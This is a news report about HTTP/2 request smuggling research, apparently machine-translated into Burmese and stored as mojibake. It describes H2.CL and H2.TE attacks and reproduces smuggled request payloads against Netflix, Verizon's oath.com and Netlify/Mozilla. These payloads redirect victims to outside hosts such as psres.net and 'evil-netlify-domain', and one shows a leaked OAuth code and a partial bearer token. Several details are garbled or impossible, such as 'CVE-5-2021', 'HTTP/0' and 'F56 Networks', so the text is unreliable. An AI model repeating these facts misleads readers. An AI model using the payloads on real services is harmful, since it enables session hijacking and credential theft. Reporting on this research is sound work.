HTTP/2 ááŸáá áºááá·áº áá»áááºáááºááŸá¯áá»á¬ážááᯠáááºáá¶ááŒá®áž HTTP/1.1 ááŸáá áºááá·áº áá±á¬ááºááœááºááá¯á· ááá¯á·ááœáŸááºááá·áº áááºá áá áºáá»á¬ážááẠâHTTP Request Smugglingâ ááá¯ááºááá¯ááºááŸá¯á áá°ááœá²á¡áá áºáá áºáá¯áá¶ááá¯á· á¡áá°ážáá®ááá¯ááºážáá¯ááºáá¬ážáá±á¬ áá¯á¶ážá áœá²áá° áá±á¬ááºážááá¯áá»ááºáá»á¬ážááᯠáá±ážááá¯á·ááŒááºážááŒáá·áº ááœáá·áºááŒá¯áá±ážááá·áº áááºá áá áºáá»á¬ážá frontend ááŸáá·áº backend á¡ááŒá¬ážáá°áá®áá±á¬á á®ážáááºážááŸá¯ááœááºá¡ááŒá¬ážá¡áá¯á¶ážááŒá¯áá°áá»á¬ážáá¶ááŸáá±á¬ááºážááá¯ááŸá¯áá»á¬ážáá¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááá¯ááá·áºááœááºážáá«á ááá¯ááºááá¯ááºááŸá¯ááᯠááá¬ážáááºáááºááá¯ááºáá áºáá¯ááŸá á ááºááŸááºáá áºáá¯áá²ááá¯á· á¡áá¹ááá¬ááºááŸááá±á¬ JavaScript áá¯ááºááᯠááá·áºááœááºážáááºá áááºáá±á¬ááºááœáá·áºááá·áºáááºááŸá¯á áá áºáá»á¬ážááᯠááŸá±á¬ááºááœááºážááŒá®áž á á áºááŸááºááŒá±á¬ááºážá¡áá±á¬ááºá¡áá¬ážáá»á¬ážááᯠááŒá¬ážááŒááºáá¬ážáá®ážááẠá¡áá¯á¶ážááŒá¯ááá¯ááºáááºá
ááŒá¿áá¬ááẠááẠproxiesá load balancersá web acceleratorsá á¡ááŒá±á¬ááºážá¡áá¬áá±ážááá¯á·ááŸá¯á áá áºáá»á¬ážááŸáá·áº áá±á¬ááºážááá¯áá»ááºáá»á¬ážááᯠfront-end-to-backend áá¯á¶á á¶ááŒáá·áº ááŒááºááœáŸááºážááá·áº á¡ááŒá¬ážááœá²á·á ááºážáá¯á¶áá»á¬ážááᯠá¡áá»áá¯ážáááºáá±á¬ááºáááºá áá±á·áá¬ááŸá¯á¡á¬áž áá±ážáá¬ážáá°ááẠNetflixá Verizoná Bitbucketá Netlify CDN ááŸáá·áº Atlassian ááá¯á·á á áá áºáá»á¬ážááᯠááá¯ááºááá¯ááºááá¯ááºááŒá±ááᯠááá¯ááºááŒáá²á·ááŒá®áž á¡á¬ážáááºážáá»ááºáá»á¬ážááᯠáá±á¬áºáá¯ááºááŒááºážá¡ááœáẠáá¯ááœá± áá±á«áºáᬠá áááá áááŸááá²á·áááºá F56 Networks áá¯ááºáá¯ááºáá»á¬ážááœááºáááºáž á¡ááá¯áá«ááŒá¿áá¬ááᯠá¡áááºááŒá¯áá¬ážáááºá ááŒá¿áá¬ááẠApache http áá¬áᬠ(CVE-5-2021) ááŸá mod_proxy á áá áºá áááºáá áºááá¯ááºáž á¡áá»áá¯ážáááºáá±á¬ááºááŸá¯ááŸááááº)á áá¬ážááŸááºáž 33193 ááœáẠááŒá¯ááŒááºááẠáá»áŸá±á¬áºááá·áºáá¬ážááẠ(áá±á¬á·ááºáá²áá±ážáá¬ážáá°áá»á¬ážááᯠáá±áá¡á á±á¬ááá¯ááºážááœáẠá¡ááá¯áá«ááŒá¿áá¬ááᯠá¡ááŒá±á¬ááºážááŒá¬ážáá²á·ááŒá®áž áááºážááᯠááŒá¯ááŒááºááẠá á á¡áá»áááºáá±ážáá²á·ááááº)á nginx ááœááºá "á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº" ááŸáá·áº "ááœáŸá²ááŒá±á¬ááºáž-áá¯ááºááŒá±á¬ááºážááŒááºáž" áá±á«ááºážá á®ážáá»á¬ážááᯠáá áºááŒáá¯ááºááẠáááºááŸááºááá¯ááºááŸá¯ááᯠáá±á¬ááºáá¯á¶ážáá¯ááºááœáŸ (2.4.49) ááœáẠááááºááá¯á·áá¬ážáááºá ááá¯ááºááá¯ááºáá±ážáááááá¬áá»á¬ážááᯠBurp áááááá¬á¡á á¯á¶ááœáẠááá·áºááœááºážáá¬ážááŒá®ážááŒá áºááŒá®áž Turbo Intruder ááá¯ážáá»á²á·ááŸá¯áá¯á¶á á¶ááŒáá·áº áááŸáááá¯ááºáá«áááºá
á¡ááœá¬ážá¡áá¬ááœáẠááá·áºááœááºážáá¬ážáá±á¬ áá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠáá±á«ááºážá ááºááŒááºážáááºážáááºážá¡áá áºá áá¯ááºáá±á¬ááºááŸá¯áááá¬áááẠááœááºáá²á·ááá·áºááŸá áºááŸá áºá á¡áá¬ážáá°áá¯áá±áá®á០áá±á¬áºáá¯ááºáá²á·áá±á¬ á¡á¬ážáááºážáá»ááºááŸáá·áº áááºáá°áá±á¬áºáááºáž HTTP/1.1 ááẠáá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠáááºáá¶ááá·áº ááŸá±á·áááºážáá»á¬ážá¡ááœáẠááá·áºáááºáá¬ážáááºá Frontend-backend á¡á á®á¡á ááºááœááºá áá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠááá¯ááºááá¯ááºáá¯ááºáá±á¬ááºáá±ážááá·áº backend ááŸáá·áº áá¬ááŸááºáᶠTCP áá»áááºáááºááŸá¯ááᯠáááºáá±á¬ááºáá±ážááá·áº áá±á¬ááºáááºááœá² node áá áºáá¯á០áááºáá¶áááŸáááẠ- áá±á¬ááºáááºáá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠááááááŒáá«á áá¯á·á á€áá¯á¶áá»áááºáááºááŸá¯ááŸáá áºááá·áºá HTTP áááá¯ááá¯áá±á¬ááŒáá·áº ááá¯ááºážááŒá¬ážáá¬ážáá±á¬ ááœááºážáááºáá áºáá¯ááŒá®ážáá áºáá¯áá±á¬ááºáááºááœá²ááŒá áºáá±á¬ ááœá²ááŒá¬ážááŒá¬ážáá¬ážáá±á¬á¡áá¯á¶ážááŒá¯áá°áá»á¬ážáá¶á០áá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠá¡áá»á¬ážá¡á¬ážááŒáá·áº áá±ážááá¯á·áá«áááºá
áá°á âHTTP Request Smugglingâ ááá¯ááºááá¯ááºááŸá¯ááẠHTTP áá±á«ááºážá á®ážáá»á¬áž âá¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááºâ ááᯠá¡áá¯á¶ážááŒá¯ááŒááºáž (áá±á¬ááºážááá¯áá»ááºááŸá áá±áá¬á á¯á á¯áá±á«ááºážá¡ááœááºá¡á á¬ážááᯠáá¯á¶ážááŒááºáááº) ááŸáá·áº âááœáŸá²ááŒá±á¬ááºáž-áá¯ááºáá¶áá«ááº- á¡ááá¯ááºážááá¯ááºâ (ááœáá·áºááŒá¯ááẠáá±áá¬áá»á¬ážááᯠá¡ááá¯ááºážá¡ááá¯áẠááœáŸá²ááŒá±á¬ááºážááŒááºáž) ááœá²ááŒá¬ážáááºá á¥ááá¬á¡á¬ážááŒáá·áºá á¡áááºá Frontend ááẠ"Content-Length" ááá¯áᬠáá¶á·ááá¯ážáá±ážáá±á¬áºáááºáž "Transfer-Encoding- chunked" ááᯠáá»á áºáá»á°ááŸá¯áá«áá ááá¯ááºááá¯ááºáá°ááẠ"Content-Length" ááŸáá·áº "Transfer-Encoding- chunked" áá±á«ááºážá á®ážááŸá áºáá¯áá¯á¶ážáá«ááŸááá±á¬ áá±á¬ááºážááá¯áá»ááºááᯠáá±ážááá¯á·ááá¯ááºáá±á¬áºáááºážá á¡ááœááºá¡á á¬ážááẠ"á¡ááŒá±á¬ááºážá¡áá¬-á¡áá»á¬áž" ááẠá¡áá¯á¶ážááá¯ááºáá¯ááºáá¬ážáá±á¬ ááœááºážáááºáá¡ááœááºá¡á á¬ážááŸáá·áº áááá¯ááºáá®áá«á á€ááá á¹á ááœááºá ááŸá±á·áá¯á¶ážááẠ"á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº" ááŸáá·áºá¡áá® áá±á¬ááºážááá¯áá»ááºááᯠáá¯ááºáá±á¬ááºááŒá®áž ááŒááºááœáŸááºážáá±ážáááºááŒá áºááŒá®ážá "ááœáŸá²ááŒá±á¬ááºáž-áá¯ááºáá¶áá«ááº- á¡ááá¯ááºážááá¯ááºáž" ááŸáá·áº ááá¯ááºááá¯ááºáá°ááá±á¬ááºážááá¯áá»ááºá áá»ááºááŸááá±á¬á¡ááŒá®ážááᯠá¡ááŒá±áá¶á ááááºááá¯á·ááŒááºážááŒá®ážáá¯á¶ážáááºá¡ááœáẠáá±á¬ááºááœááºááŸááẠá á±á¬áá·áºááá¯ááºážáá±áááºááŒá áºáá«áááºá á¡ááŒá¬ážáá°áá áºáŠážá áá±á¬ááºážááá¯ááŸá¯áá¡á ááœáẠáá±á¬ááºááá¯á· áá±ážááá¯á·áááºááŒá áºáááºá
áá»ááºážá¡ááá·áºááœáẠááœá²ááŒááºážá áááºááŒá¬áá¬ážááá·áº á á¬áá¬ážáááá¯ááá¯áá±á¬ HTTP/1.1 ááŸáá·áºááá°áá² HTTP/2 ááẠááœááááá¯ááá¯áá±á¬áá áºáá¯ááŒá áºááŒá®áž ááŒáá¯áááºáááºááŸááºáá¬ážáá±á¬ á¡ááœááºá¡á á¬ážáá áºáá¯á áá±áá¬ááá±á¬ááºáá»á¬ážááᯠá á®áá¶ááá·áºááœá²áááºá ááá¯á·áá±á¬áº HTTP/2 ááẠáá¯á¶ááŸáẠHTTP áá±á«ááºážá á®ážáá»á¬ážááŸáá·áº ááá¯ááºáá®áá±á¬ pseudo-headers ááᯠá¡áá¯á¶ážááŒá¯áááºá HTTP/1.1 áááá¯ááá¯áá±á¬ááŸáá áºááá·áº áá±á¬ááºááœááºááŸá¡ááŒááºá¡ááŸááºáá¯á¶á·ááŒááºááŸá¯ááá á¹á ááœááºá ááŸá±á·áááºážá០á¡ááá¯áá« pseudo-áá±á«ááºážá á®ážáá»á¬ážááᯠáááºáá° HTTP áá±á«ááºážá á®áž HTTP/1.1 ááá¯á· áá¬áá¬ááŒááºááá¯áááºá ááŒá¿áá¬ááŸá¬ áá°áááºážáá±á¬ááºážááá¯ááŸá¯á ááá·áºáááºáá±á¬ááºáá»á¬ážá¡ááŒá±á¬ááºáž á¡áá»ááºá¡áááºááááŸááá² Frontend ááŸáááºááŸááºáá¬ážáá±á¬ HTTP áá±á«ááºážá á®ážáá»á¬ážáá±á«áºá¡ááŒá±áá¶á backend ááẠstream áá»á¬ážááᯠááá¯ááºážááŒá¬ážááẠáá¯á¶ážááŒááºáá»ááºáá»á¬ážáá»ááŒááºážááŒá áºáá«áááºá
á¡áá°ážáááŒáá·áºá áá±áá¬á¡á¬ážáá¯á¶ážáá¡ááœááºá¡á á¬ážááá¯áááºááŸááºáá¬ážáá±á¬ááŒá±á¬áá·áº HTTP/2 ááœááºá¡áá¯á¶ážáááŒá¯áá±á¬áºáááºážá "á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº" ááŸáá·áº "ááœáŸá²ááŒá±á¬ááºáž-áá¯ááºáá¯ááºááŒááºáž" áááºááá¯ážáá»á¬ážááᯠpseudo-headers áá¯á¶á á¶ááŒáá·áº áá±ážááá¯á·ááá¯ááºáááºá áá®ážááŒá¬ážáááºáááºáá áºáá¯ááœááºá ááá¯á·áá±á¬áºá HTTP/2 áá±á¬ááºážááá¯áá»ááºá¡á¬áž HTTP/1.1 ááá¯á·ááŒá±á¬ááºážáá²ááŒááºáž áá¯ááºáááºážá ááºá¡ááœááºážá á¡ááá¯áá« áá±á«ááºážá á®ážáá»á¬ážááᯠáááºáá±á¬ááºááœá¬ážááŒá®áž áá±á¬ááºááœááºááœáẠááŸá¯ááºááœá±ážááœá¬ážááá¯ááºáááºá H2.TE ááŸáá·áº H2.CL ááœáẠá¡ááá ááá¯ááºááá¯ááºááŸá¯áá»áá¯ážááœá² ááŸá áºáᯠááŸááááºá áááºážááœáẠááŸá¬ážááœááºážáá±áá±á¬ ááœáŸá²ááŒá±á¬ááºáž-áá¯ááºáá¶áá«áẠááá¯á·ááá¯áẠá¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááºáááºááá¯ážááŒáá·áº ááŸá±á·áááºážá០áááºáá¶áááŸáááá·áº áá±á¬ááºážááá¯áá»ááºááá¯ááºáááºá á¡ááŸááºááááºá¡ááœááºá¡á á¬ážááŸáá·áº áááá¯ááºáá®ááá·áº áá±á¬ááºááœááºá០ááŸáá·áºááŒá¬ážááœá¬ážáá«áááºá HTTP/2 áááá¯ááá¯áá±á¬á
H2.CL ááá¯ááºááá¯ááºááŸá¯á á¥ááá¬áá áºáá¯ááẠNetflix ááá¯á· HTTP/2 áá±á¬ááºážááá¯áá»ááºáá áºáá¯áá±ážááá¯á·áá±á¬á¡áá« á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸáẠpseudo-header ááœáẠááŸá¬ážááœááºážáá±á¬á¡ááœááºá¡á á¬ážááᯠáááºááŸááºáááºááŒá áºáááºá á€áá±á¬ááºážááá¯áá»ááºááẠHTTP/1.1 ááŸáá áºááá·áº backend ááá¯áááºáá±á¬ááºááá·áºá¡áá« á¡áá¬ážáá° HTTP header Content-Length ááᯠáááºááá¯ážá á±áááºá ááá¯á·áá±á¬áº Content-Length ááŸá á¡ááœááºá¡á á¬ážááẠá¡ááŸááºááááºáá áºáá¯áááºáááºážáá±á¬ááŒá±á¬áá·áºá á¡ááŒá®ážááŸá áá±áá¬á¡á áááºá¡ááá¯ááºážááᯠá á®áá¶áá±á¬ááºááœááºáá±ážááẠáá±á¬ááºáá±á¬ááºážááá¯ááŸá¯áá¡á á
á¥ááá¬á¡á¬ážááŒáá·áº HTTP/2 :method POST :path /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
áá±á¬ááºááœááºá០áá±á¬ááºážááá¯áá»ááºáá áºáᯠáá±ážááá¯á·ááŒááºáž ááááºááŒá áºáááá·áºáááº- POST /n HTTP/1.1 áááºáá¶áá°- www.netflix.com á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº- 4 abcdGET /n HTTP/1.1 áááºáá¶áá±á¬ááºááœááºáá±ážáá°- 02.rs?x.netflix.com Foo: áá¬áž
Content-Length ááẠáááºááá¯áž 4 ááŒá áºáá±á¬ááŒá±á¬áá·áºá backend ááẠáá±á¬ááºážááá¯áá»ááºáááá¯ááºáááºá¡ááŒá Ạ"abcd" ááá¯áᬠáááºáá¶áááºááŒá áºááŒá®áž áá»áẠ"GET /n HTTP/1.1..." ááá±á¬ááºáááºááœá²áá±á¬ááºážááá¯ááŸá¯áá¡á á¡ááŒá Ạáá¯ááºáá±á¬ááºááœá¬ážáá«áááºá á¡ááŒá¬ážá¡áá¯á¶ážááŒá¯áá°ááŸáá·áº áááºá ááºáá±áááºá ááá¯á·ááŒá±á¬áá·áºá stream ááẠáááºááá·áºááœá¬ážáááºááŒá áºááŒá®áž áá±á¬ááºáá±á¬ááºážááá¯áá»ááºá¡ááœáẠáá¯á¶á·ááŒááºááŸá¯á¡áá±ááŒáá·áºá dummy áá±á¬ááºážááá¯ááŸá¯ááᯠáá¯ááºáá±á¬ááºááŒááºážáááááºááᯠáá¯ááºááŒááºáá«áááºá Netflix áááá á¹á áááºááœááºá "Host:" áá±á«ááºážá á®ážááœáẠááŒááºáááŸá¡áááºááŸááºáá áºáŠážááᯠáááºááŸááºááŒááºážááŸá¬ dummy áá±á¬ááºážááá¯áá»ááºááŒá±á¬áá·áº client á០"áááºáá±áá¬- https://02.rs?x.netflix.com/n" ááŸáá·áº áá¯á¶á·ááŒááºááŸá¯ááᯠááŒááºáá±ážáá²á·áááºá Netflix ááá¯ááºá áááºá ááºááŸá¯ááœáẠáááºá JavaScript áá¯ááºááᯠááœáá·áºááŒááºáž á¡áá«á¡ááẠááááºáááᯠá¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááᯠáá¯á¶ážá áœá²áá°áᶠáá±ážááá¯á·ááẠááœáá·áºááŒá¯áá¬ážáááºá
áá¯ááá ááá¯ááºááá¯ááºááŸá¯ ááœá±ážáá»ááºááŸá¯ (H2.TE) ááœáẠâTransfer-Encoding- chunkedâ áá±á«ááºážá á®ážááᯠá¡á á¬ážááá¯ážááŒááºáž áá«áááºáááºá HTTP/2 ááœáẠááœáŸá²ááŒá±á¬ááºáž-áá¯ááºááŸááºáá¬ážáá±á¬ pseudo-header ááᯠá¡áá¯á¶ážááŒá¯ááŒááºážááᯠáááºááŸááºáá»ááºáá»á¬ážááŒáá·áº áá¬ážááŒá áºáá¬ážááŒá®áž áááºážááŸáá·áº áá±á¬ááºážááá¯áá»ááºáá»á¬ážááᯠááŸá¬ážááœááºážáááºáᯠáááºááŸááºáááºá áááºážáá²á·ááá¯á·ááŒá áºááá·áºáá á¬ážá á¡áá»áá¯á·áá±á¬ frontend á¡áá±á¬ááºá¡áááºáá±á¬áºááŸá¯áá»á¬ážááẠá€ááá¯á¡ááºáá»ááºááᯠááá·áºááœááºážá ááºážá á¬ážááŒááºážáááŸááá² HTTP/2 ááœáẠááœáŸá²ááŒá±á¬ááºáž-áá¯ááºááŸááºáá¬ážáá±á¬ pseudo-header ááᯠá¡áá¯á¶ážááŒá¯ááœáá·áºáááŒá¯áá²á áááºážááẠá¡áá¬ážáá° HTTP áá±á«ááºážá á®ážá¡ááŒá áºááá¯á· ááŒá±á¬ááºážáá²ááœá¬ážáá±á¬ HTTP/0 ááœáẠááŒá áºáááºá âTransfer-Encodingâ áá±á«ááºážá á®ážááŸááá«áá áá±á¬ááºáá¶áá°ááẠáááºážááᯠááá¯ááá¯áŠážá á¬ážáá±ážá¡ááŒá Ạáá°ááá¯ááºááŒá®áž âá¡áá¯á¶ážááá¯ááºá¡áá¯á¶ážááá¯ááºâ áá¯ááºááœáẠâ{size}\r\n{blockâ áá¯á¶á á¶ááŒáá·áº ááœá²ááŒá¬ážáá±á¬á¡ááœááºá¡á á¬ážáá¯á¶ážáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯áᬠáá±áá¬á¡ááá¯ááºážááᯠá¡ááá¯ááºážááá¯ááºážááœá²ááŒááºážá áááºááŒá¬ááá¯ááºááẠ}\r\n{size} \r\n{block}\r\nXNUMX", á¡áá¯á¶ážá á¯á¶á¡ááœááºá¡á á¬ážááŒáá·áº áááŠážááá¯ááºážááŒá¬ážáá¬ážáá±á¬áºáááºážá
ááá¯áá²á·ááá¯á·áá±á¬ááœá¬ááá»ááºááŸááá±ááŒááºážááᯠVerizon áá¥ááá¬á¡á¬ážááŒáá·áºááŒááá²á·áááºá á¡ááá¯áá«ááŒá¿áá¬ááẠHuffington Post ááŸáá·áº Engadget áá²á·ááá¯á·áá±á¬ áááºááá¯ááºáá»á¬ážááœáẠá¡áá¯á¶ážááŒá¯ááá·áº á¡áá±á¬ááºá¡áá¬ážá áá á áºááŒááºážáá±á«áºáááºááŸáá·áº á¡ááŒá±á¬ááºážá¡áá¬á á®áá¶ááá·áºááœá²ááŸá¯á áá áºááá¯á·ááŸáá·áº áááºááá¯ááºáá«áááºá á¥ááá¬á¡á¬ážááŒáá·áºá HTTP/2 ááŸáááá·áº client áá±á¬ááºážááá¯áá»ááº- :method POST :path /identitfy/XUI :authority id.b2b.oath.com ááœáŸá²ááŒá±á¬ááºáž-áá¯ááºáá¶áá«ááºááᯠá¡ááá¯ááºážááá¯áẠ0 GET /oops HTTP/1.1 Host- psres.net á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº- 10 x=
áá±á¬ááºááœááºá០HTTP/1.1 áá±á¬ááºážááá¯áá»ááºáá áºáᯠáá±ážááá¯á·ááŒááºážá០ááááº- POST /identity/XUI HTTP/1.1 Host: id.b2b.oath.com á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº- 66 Transfer-Encoding- chunked 0 GET /oops HTTP/1.1 Host: psresá á¡áá¬ážááẠá¡ááŒá±á¬ááºážá¡áá¬- á¡ááŸááº- 10x=
áá áºááẠáá±á¬ááºáá¶áá°ááẠ"á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº" áá±á«ááºážá á®ážááᯠáá»á áºáá»á°ááŸá¯áá²á·ááŒá®áž "ááœáŸá²ááŒá±á¬ááºáž-áá¯ááºááœááºážááŒááºáž- chunked" ááᯠá¡ááŒá±áá¶á áá¯ááºááœáŸáá·áºááŸá¯á¡ááœááºážááá¯ááºážááŒá¬ážááŒááºážááᯠáá¯ááºáá±á¬ááºáá²á·áááºá áááºááœá±á·ááœááºá ááá¯ááºááá¯ááºááŸá¯ááẠOAuth á á áºááŸááºááŒá±á¬ááºážá¡áá±á¬ááºá¡áá¬ážááŒááŒááºážááŸáá·áº áááºááá¯ááºááá·áº áá±á¬ááºážááá¯áá»ááºáá»á¬ážááᯠááŒá¬ážááŒááºááŒááºážá¡áá«á¡áááºá ááá¯ážáá¬ážáá°áá±á«ááºážá á®ážááœááºááŒááá¬ážááá·áº ááá·áºáááºáá»ááºáá»á¬ážá¡ááŒáẠá¡áá±á¬ááºá¡áá¬ážá áá á áºáá±ážá¡ááá¯ááºážááᯠá¡áá¯áá°áᬠá¡áá¯á¶ážááŒá¯áá°áá áá áºá¡á¬áž á¡áá±á¬ááºá¡áá¬ážáá»á¬ážáá±ážááá¯á·ááẠá áá áºá¡á áá»áá¯ážááŒááºážá¡áá«á¡ááẠá¡áá¯á¶ážááŒá¯áá°áá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠáááºážááá¯á·ááááºááá¯ááºááá¯á· áááºážááŒá±á¬ááºážááŒááºááœáŸááºááá¯ááºá á±áá²á·áááºá ááá¯ááºááá¯ááºáá°áá¡áááºááŸááºáá¶ááá¯á· ááá°áá« /b2blanding/show/oops HTTP/1.1 áááºáá¶áá°- psres.net áááºááœáŸááºážáá°- https://id.b2b.oath.com/?âŠ&code=secret GET / HTTP/1.1 áááºáá¶áá±á¬ááºááœááºáá±ážáá°- psres.net ááœáá·áºááŒá¯áá»ááº- Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik
Transfer-encoding pseudo-header ááᯠáááºááŸááºáá¬ážááŒááºáž áááŒá¯áá±á¬ HTTP/2 á¡áá±á¬ááºá¡áááºáá±á¬áºááŸá¯áá»á¬ážááᯠááá¯ááºááá¯ááºáááºá¡ááœááºá áááºážá¡á¬áž ááá¯ááºážá¡áá áºá¡áá¹ááá¬ááŒáá·áº ááŒá¬ážáá¬ážáá±á¬ á¡ááŒá¬áž pseudo-headers áá»á¬ážááŸáá·áº áá»áááºáááºááŒááºážááŒáá·áº "Transfer-Encoding" áá±á«ááºážá á®ážááᯠá¡á á¬ážááá¯ážááẠá¡ááŒá¬ážáááºážáááºážááᯠá¡ááá¯ááŒá¯áá¬ážáá«áááºá á€ááá á¹á ááœáẠHTTP/1.1 ááá¯á·ááŒá±á¬ááºážáá±á¬á¡áá« áá®ážááŒá¬áž HTTP áá±á«ááºážá á®ážááŸá áºáá¯ááᯠáááºáá®ážáááº)á
á¥ááá¬á¡á¬ážááŒáá·áºá Atlassian Jira ááŸáá·áº Netlify CDN (Firefox ááœáẠMozilla á áááºá á¬áá»ááºááŸá¬ááá¯á¡áá¯á¶ážááŒá¯áááºá¡áá¯á¶ážááŒá¯áááº) á€ááŒá¿áá¬ááŒá±á¬áá·áº ááááá¯ááºáá²á·áááºá á¡áá°ážáááŒáá·áºá HTTP/2 áá±á¬ááºážááá¯áá»ááº-áááºážáááºáž POST :path / :authority start.mozilla.org foo b\r\n ááœáŸá²ááŒá±á¬ááºáž-áá¯ááºáá¶áá«ááº- 0\r\n \r\n GET / HTTP/1.1\r\n áááºáá¶áá±á¬ááºááœááºáá±ážááẠ: evil-netlify-domain\r\n á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº- 5\r\n \r\nx=
ááááºá¡áá±ááŒáá·áº HTTP/1.1 POST / HTTP/1.1 áá±á¬ááºážááá¯áá»ááºááᯠbackend ááá¯á· áá±ážááá¯á·ááŒááºáž\r\n Host- start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding- chunked\r\n á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸáẠ: 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host- evil-netlify-domain\r\n á¡ááŒá±á¬ááºážá¡áá¬-á¡ááŸááº- 5\r\n \r \nx=
âTransfer-Encodingâ áá±á«ááºážá á®ážááᯠá¡á á¬ážááá¯ážááẠá¡ááŒá¬ážááœá±ážáá»ááºá áá¬ááŸá¬ áááºážááᯠá¡ááŒá¬ážáá±á¬ pseudo-header á á¡ááẠááá¯á·ááá¯áẠáá±á¬ááºážááá¯ááŸá¯áááºážáááºážááŒáá·áº á á¬ááŒá±á¬ááºážáá áºáá¯ááá¯á· áá°ážááœá²áááºááŒá áºáááºá á¥ááá¬á¡á¬ážááŒáá·áºá Atlassian Jira ááá¯áááºáá±á¬ááºááá·áºá¡áá«á áááºááá¯áž "á¡áá¯á¶ážá¡ááŒá²" ááŒáá·áº "foo: bar" ááŸáá·áº "transfer-encoding: chunked" ááŸáá·áº pseudo-header name "foo: bar\r\ntransfer-encoding" ááẠHTTP áá±á«ááºážá á®ážáá»á¬ážááᯠ"foo: bar" ááŸáá·áº "transfer-encoding: chunked" ááá¯á·ááᯠááá·áºááœááºážá á±áá²á·áááºá ááŸáá·áº pseudo-header ":method" áááºááá¯áž áááºááŸááºááŒááºáž "GET / HTTP/1.1\r\nTransfer-encoding: chunked" ááᯠ"GET / HTTP/1.1\r\ntransfer-encoding: chunked" ááá¯á· áá¬áá¬ááŒááºááá¯áá¬ážáá«áááºá
ááŒá¿áá¬ááᯠáá±á¬áºáá¯ááºáá²á·áá±á¬ áá¯áá±áá®ááẠááŸá±á·áááºážáá»á¬ážááᯠááá¯ááºááá¯ááºááẠáá±á¬ááºážááá¯ááá·áº á¥áááºááŸáá¯ááºáá±á«ááºážáááºážááá¬ááᯠá¡ááá¯ááŒá¯áá²á·ááŒá®áž IP ááááºá
á¬áá
áºáá¯á
á®ááẠáá±á¬ááºááœááºááá¯á· áá®ážááŒá¬ážáá»áááºáááºááŸá¯áá
áºáᯠááŒá¯áá¯ááºáá±ážáᬠááá°áá®áá±á¬ á¡áá¯á¶ážááŒá¯áá°áá»á¬ážáá¶á០ááœá¬ážáá¬ááŸá¯ áá±á¬ááœá±ážááŒááºážáááŸááá±á á¡ááá¯ááŒá¯áá¬ážáá±á¬áááºážááá¬ááẠá¡ááŒá¬ážá¡áá¯á¶ážááŒá¯áá°áá»á¬ážáá¶á០áá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠáááºáá±á¬ááºá
áœááºáááºááŒááºážá¡á¬áž ááœáá·áºáááŒá¯áá±á¬áºáááºážá á¡ááŒá¬ážáá±á¬ááºážááá¯ááŸá¯áá»á¬ážááᯠáá¯ááºáá±á¬ááºááŒááºážá¡áá±á«áº áááºáá±á¬ááºááŸá¯ááŸááá±á¬ áá»áŸáá±áá¬ážáá±á¬ áááºááŸáºááᯠá¡ááááºááá·áºá
á±áᬠáááºáá±á¬ááºááŸá¯á¡áá»ááºá¡áááºáá»á¬ážááᯠááŸá±á·áááºážá០áá±á¬ááºááœááºááá¯á· ááœáŸá²ááŒá±á¬ááºážáá¬ááœáẠá¡áá¯á¶ážááŒá¯ááá·áº á¡ááœááºážááá¯ááºáž HTTP áá±á«ááºážá
á®ážáá»á¬ážááᯠá¡á
á¬ážááá¯ážááœáá·áºááŒá¯ááẠ( á¥ááá¬á¡á¬ážááŒáá·áºá ááá¯áá²á·ááá¯á·áá±á¬ áá±á«ááºážá
á®ážáá»á¬ážááŸá ááŸá±á·áááºážáááºááœáẠá
á
áºááŸááºááŒá±á¬ááºáž á¡áá±á¬ááºá¡áá¬ážááŒááá·áºá¡áá« áááºááŸáá¡áá¯á¶ážááŒá¯áá°á á¡áá»ááºá¡áááºáá»á¬ážááᯠáá±á¬ááºááœááºááá¯á· ááá¯á·ááá¯ááºáááº)á áááºááŸáºá¡ááááºáááºááŒááºážááᯠá¡áá¯á¶ážááŒá¯á áááºááœá±á·ááœáẠá¡ááá¯áá«áááºážáááºážááᯠáá»áá·áºáá¯á¶ážááŒááºážáá¥ááá¬áá
áºáá¯á¡áá±ááŒáá·áº Bitbucket áááºáá±á¬ááºááŸá¯ááŸá á
á¬áá»ááºááŸá¬áá»á¬ážááᯠááááºážáá»á¯ááºááá¯ááºáá²á·áááºá
source: opennet.ru